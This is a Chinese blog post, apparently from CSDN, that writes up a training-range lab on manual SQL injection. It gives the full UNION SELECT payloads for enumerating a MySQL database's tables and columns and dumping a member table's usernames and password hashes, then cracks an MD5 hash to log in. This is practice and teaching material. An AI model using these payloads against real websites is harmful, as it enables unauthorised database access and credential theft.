【墨者靶场】---1、SQL手工注入漏洞测试

实训目标

  • 掌握SQL注入原理;
  • 了解手工注入的方法;
  • 了解MySQL的数据结构;
  • 了解字符串的MD5加解密;

sql注入的流程

  • 1、判断注入点
  • 2、判断注入类型,是字符型还是数字型
  • 3、判断字段数
  • 4、判断显示位
  • 5、得库名
  • 6、得表名
  • 7、得列名
  • 8、得数据

盲注和报错注入可能不太会用到上面的步骤,但是大致思想都是相同的。


注入步骤

起初以为是在登录窗口进行的POST注入,试了很多次没有成功,后来发现下面还有一个页面
在这里插入图片描述
在这里找到了它的注入点在URL中
在这里插入图片描述
接下来判断注入类型(这里and应该是被过滤了,只能用or)
在这里插入图片描述
在这里插入图片描述
可知为字符型注入点,接下来判断字段数
在这里插入图片描述
在这里插入图片描述
可知字段数为4,接下来判断显示位,回显出了2和3
在这里插入图片描述
得库名,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,database(),3,4 --+
在这里插入图片描述得表名,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+
在这里插入图片描述
查看stormgroup_member中的列名,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name="stormgroup_member"--+
在这里插入图片描述
查看name和password中的数据,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,group_concat(name,"^",password),3,4 from stormgroup_member --+。注入成功。
在这里插入图片描述
将第二个密码穷举摘要可得,用户名:mozhe 密码:166978。登录得key。
在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值